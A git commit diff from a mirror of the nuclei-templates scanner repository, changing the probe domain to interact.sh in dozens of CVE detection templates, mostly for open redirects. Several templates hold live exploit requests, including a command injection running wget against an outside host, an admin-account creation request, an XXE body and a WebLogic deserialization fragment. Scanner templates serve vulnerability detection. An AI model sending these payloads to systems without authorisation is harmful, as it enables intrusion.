daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fixed possible FPs in open redirect templates (#4544) 

* Fixed possible FPs in open redirect templates

We have replaced example.com with interact.sh since few domains redirect to example.com, which results in FP results.

* updated example domain

Co-authored-by: sandeep <sandeep@projectdiscovery.io>
patch-1
Prince Chaddha 2022-06-06 16:10:15 +05:30 committed by GitHub
parent 92f442915f
commit 7ada510859
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
99 changed files with 303 additions and 303 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
cves/2009/CVE-2009-5020.yaml
View File

@ -19,13 +19,13 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/awstats/awredir.pl?url=example.com'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
- '{{BaseURL}}/awstats/awredir.pl?url=interact.sh'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/02/13

4
cves/2013/CVE-2013-2248.yaml
View File

@ -18,12 +18,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/index.action?redirect:http://www.example.com/"
- "{{BaseURL}}/index.action?redirect:http://www.interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by mp on 2022/02/21

4
cves/2014/CVE-2014-9617.yaml
View File

@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/"
- "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# Enhanced by mp on 2022/02/25

4
cves/2015/CVE-2015-5354.yaml
View File

@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://example.com'
- '{{BaseURL}}/novius-os/admin/nos/login?redirect=http://interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
cves/2015/CVE-2015-5461.yaml
View File

@ -17,10 +17,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Fexample.com"
- "{{BaseURL}}/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

4
cves/2015/CVE-2015-7823.yaml
View File

@ -16,10 +16,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://example.com/"
- "{{BaseURL}}/CMSPages/GetDocLink.ashx?link=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

4
cves/2016/CVE-2016-3978.yaml
View File

@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/login?redir=http://www.example.com'
- '{{BaseURL}}/login?redir=http://www.interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

2
cves/2017/CVE-2017-10271.yaml
View File

@ -42,7 +42,7 @@ requests:
<string>-c</string>
</void>
<void index="2">
<string>example.com</string>
<string>interact.sh</string>
</void>
</array>
<void method="start"/></void>

4
cves/2017/CVE-2017-12138.yaml
View File

@ -26,7 +26,7 @@ requests:
uname={{username}}&pass={{password}}&xoops_redirect=%2Findex.php&op=login
- |
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.attacker.com HTTP/1.1
GET /modules/profile/index.php?op=main&xoops_redirect=https:www.interact.sh HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
@ -34,4 +34,4 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
cves/2017/CVE-2017-3528.yaml
View File

@ -20,12 +20,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com"
- "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"
matchers:
- type: word
words:
- 'noresize src="/\example.com?configName='
- 'noresize src="/\interact.sh?configName='
part: body
# Enhanced by mp on 2022/04/14

4
cves/2018/CVE-2018-11784.yaml
View File

@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}//example.com"
- "{{BaseURL}}//interact.sh"
matchers:
- type: regex
regex:
- "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?example.com"
- "(?m)^(L|l)ocation: (((http|https):)?//(www.)?)?interact.sh"
part: header
# Enhanced by mp on 2022/04/26

4
cves/2018/CVE-2018-12300.yaml
View File

@ -19,10 +19,10 @@ requests:
- method: GET
path:
- '{{BaseURL}}/echo-server.html?code=test&state=http://www.attacker.com#'
- '{{BaseURL}}/echo-server.html?code=test&state=http://www.interact.sh#'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
cves/2018/CVE-2018-12675.yaml
View File

@ -23,10 +23,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fattacker.com'
- '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh'
matchers:
- type: word
part: body
words:
- '<META http-equiv="Refresh" content="0;URL=http://attacker.com">'
- '<META http-equiv="Refresh" content="0;URL=http://interact.sh">'

6
cves/2018/CVE-2018-14474.yaml
View File

@ -21,12 +21,12 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/login?next=http://attacker.com/?app.scan/'
- '{{BaseURL}}/signup?next=http://attacker.com/?app.scan/'
- '{{BaseURL}}/login?next=http://interact.sh/?app.scan/'
- '{{BaseURL}}/signup?next=http://interact.sh/?app.scan/'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

6
cves/2018/CVE-2018-14574.yaml
View File

@ -22,7 +22,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}//www.example.com"
- "{{BaseURL}}//www.interact.sh"
matchers-condition: and
matchers:
@ -31,6 +31,6 @@ requests:
- 301
- type: word
words:
- "Location: https://www.example.com"
- "Location: http://www.example.com"
- "Location: https://www.interact.sh"
- "Location: http://www.interact.sh"
part: header

4
cves/2018/CVE-2018-14931.yaml
View File

@ -19,12 +19,12 @@ requests:
- method: GET
path:
- '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.example.com'
- '{{BaseURL}}/IntellectMain.jsp?IntellectSystem=https://www.interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/26

6
cves/2018/CVE-2018-16761.yaml
View File

@ -21,12 +21,12 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/select_project.php?url=http://attacker.com'
- '{{BaseURL}}/clock_status.php?current_page=http://attacker.com'
- '{{BaseURL}}/select_project.php?url=http://interact.sh'
- '{{BaseURL}}/clock_status.php?current_page=http://interact.sh'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

6
cves/2018/CVE-2018-17422.yaml
View File

@ -22,8 +22,8 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.example.com'
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=example.com'
- '{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://www.interact.sh'
- '{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=interact.sh'
stop-at-first-match: true
matchers-condition: and
@ -32,7 +32,7 @@ requests:
- type: word
part: body
words:
- "self.location = 'http://www.example.com'"
- "self.location = 'http://www.interact.sh'"
- type: status
status:

2
cves/2018/CVE-2018-3167.yaml
View File

@ -20,7 +20,7 @@ requests:
path:
- '{{BaseURL}}/OA_HTML/lcmServiceController.jsp'
body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://example.com">
body: <!DOCTYPE root PUBLIC "-//B/A/EN" "http://interact.sh">
matchers-condition: and
matchers:

6
cves/2018/CVE-2018-6200.yaml
View File

@ -21,8 +21,8 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/redirector.php?url=https://attacker.com'
- '{{BaseURL}}/redirector.php?do=nodelay&url=https://attacker.com'
- '{{BaseURL}}/redirector.php?url=https://interact.sh'
- '{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh'
matchers-condition: and
matchers:
@ -30,7 +30,7 @@ requests:
- type: word
part: body
words:
- '<meta http-equiv="refresh" content="0; URL=https://attacker.com">'
- '<meta http-equiv="refresh" content="0; URL=https://interact.sh">'
- type: status
status:

4
cves/2019/CVE-2019-1010290.yaml
View File

@ -19,10 +19,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/modules/babel/redirect.php?newurl=http://example.com'
- '{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
cves/2019/CVE-2019-14223.yaml
View File

@ -25,10 +25,10 @@ requests:
Content-Type: application/x-www-form-urlencoded
body: |
success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass
success=%2Fshare%2Fpage%2F&failure=:\\interact.sh&username=baduser&password=badpass
matchers:
- type: regex
part: header
regex:
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?example\\.com(?:\\s*)$"
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$"

2
cves/2019/CVE-2019-16097.yaml
View File

@ -25,7 +25,7 @@ requests:
headers:
Content-Type: application/json
body: |
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@example.com", "realname": "poc"}
{"username": "testpoc", "has_admin_role": true, "password": "TestPoc!", "email": "testpoc@interact.sh", "realname": "poc"}
matchers-condition: and
matchers:

4
cves/2019/CVE-2019-3912.yaml
View File

@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://example.com'
- '{{BaseURL}}/labkey/__r1/login-login.view?returnUrl=http://interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
cves/2019/CVE-2019-7275.yaml
View File

@ -20,10 +20,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/updating.jsp?url=https://example.com/"
- "{{BaseURL}}/updating.jsp?url=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

6
cves/2020/CVE-2020-11034.yaml
View File

@ -21,13 +21,13 @@ requests:
- method: GET
path:
- '{{BaseURL}}/index.php?redirect=/\/evil.com/'
- '{{BaseURL}}/index.php?redirect=//evil.com'
- '{{BaseURL}}/index.php?redirect=/\/interact.sh/'
- '{{BaseURL}}/index.php?redirect=//interact.sh'
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?evil\.com(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
part: header
# Enhanced by mp on 2022/05/04

4
cves/2020/CVE-2020-11529.yaml
View File

@ -20,12 +20,12 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/%252f%255cexample.com%252fa%253fb/'
- '{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/'
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
part: header
# Enhanced by mp on 2022/05/04

2
cves/2020/CVE-2020-13945.yaml
View File

@ -30,7 +30,7 @@ requests:
"upstream":{
"type":"roundrobin",
"nodes":{
"example.com:80":1
"interact.sh:80":1
}
}
}

4
cves/2020/CVE-2020-18268.yaml
View File

@ -28,7 +28,7 @@ requests:
btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0
- |
GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2
GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2
Host: {{Hostname}}
cookie-reuse: true
@ -36,4 +36,4 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
cves/2020/CVE-2020-22840.yaml
View File

@ -19,10 +19,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com"
- "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
part: header

4
cves/2020/CVE-2020-23015.yaml
View File

@ -19,10 +19,10 @@ requests:
- method: GET
path:
- '{{BaseURL}}/?url=http://example.com'
- '{{BaseURL}}/?url=http://interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'

4
cves/2020/CVE-2020-24550.yaml
View File

@ -17,14 +17,14 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com'
- '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh'
matchers-condition: and
matchers:
- type: word
part: header
words:
- "Location: https://example.com"
- "Location: https://interact.sh"
- type: status
status:

2
cves/2020/CVE-2020-35476.yaml
View File

@ -18,7 +18,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
- "{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://interact.sh%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"
matchers-condition: and
matchers:
- type: status

4
cves/2020/CVE-2020-36365.yaml
View File

@ -22,10 +22,10 @@ requests:
- method: GET
path:
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.example.com'
- '{{BaseURL}}/backend/admin/common/clearcache?previousUrl=http://www.interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

2
cves/2021/CVE-2021-21311.yaml
View File

@ -21,7 +21,7 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/adminer?elastic=example.com&username="
- "{{BaseURL}}/adminer?elastic=interact.sh&username="
matchers-condition: and
matchers:

2
cves/2021/CVE-2021-21389.yaml
View File

@ -28,7 +28,7 @@ requests:
"user_login":"{{randstr}}",
"password":"{{randstr}}",
"user_name":"{{randstr}}",
"user_email":"{{randstr}}@example.com"
"user_email":"{{randstr}}@interact.sh"
}
matchers-condition: and

2
cves/2021/CVE-2021-21745.yaml
View File

@ -23,7 +23,7 @@ requests:
- |
GET /goform/goform_get_cmd_process?cmd=psw_fail_num_str HTTP/1.1
Host: {{Hostname}}
Referer: http://evil.com/127.0.0.1.html
Referer: http://interact.sh/127.0.0.1.html
matchers-condition: and
matchers:

2
cves/2021/CVE-2021-22054.yaml
View File

@ -31,4 +31,4 @@ requests:
- type: word
words:
- "<title>Example Domain</title>"
- "<h1> Interactsh Server </h1>"

14
cves/2021/CVE-2021-22873.yaml
View File

@ -20,12 +20,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/www/delivery/lg.php?dest=http://example.com"
- "{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh"
- "{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"
stop-at-first-match: true
redirects: true
@ -37,5 +37,5 @@ requests:
- 200
- type: word
words:
- "<title>Example Domain</title>"
- "<h1> Interactsh Server </h1>"
part: body

4
cves/2021/CVE-2021-24210.yaml
View File

@ -22,10 +22,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Fexample.com"
- "{{BaseURL}}/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

4
cves/2021/CVE-2021-24288.yaml
View File

@ -18,10 +18,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://example.com&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
- "{{BaseURL}}/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

4
cves/2021/CVE-2021-24358.yaml
View File

@ -23,7 +23,7 @@ requests:
Host: {{Hostname}}
- |
GET /wp-login.php?action=theplusrp&key=&redirecturl=http://attacker.com&forgoturl=http://attacker.com&login={{username}} HTTP/1.1
GET /wp-login.php?action=theplusrp&key=&redirecturl=http://interact.sh&forgoturl=http://interact.sh&login={{username}} HTTP/1.1
Host: {{Hostname}}
redirects: true
@ -31,7 +31,7 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
extractors:
- type: regex

4
cves/2021/CVE-2021-24406.yaml
View File

@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/community/?foro=signin&redirect_to=https://example.com/"
- "{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header
# Enhanced by mp on 2022/04/13

4
cves/2021/CVE-2021-24838.yaml
View File

@ -19,14 +19,14 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://example.com"
- "{{BaseURL}}/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh"
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status
status:

4
cves/2021/CVE-2021-25028.yaml
View File

@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://example.com"
- "{{BaseURL}}/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/13

4
cves/2021/CVE-2021-25033.yaml
View File

@ -19,12 +19,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/?noptin_ns=email_click&to=https://example.com"
- "{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
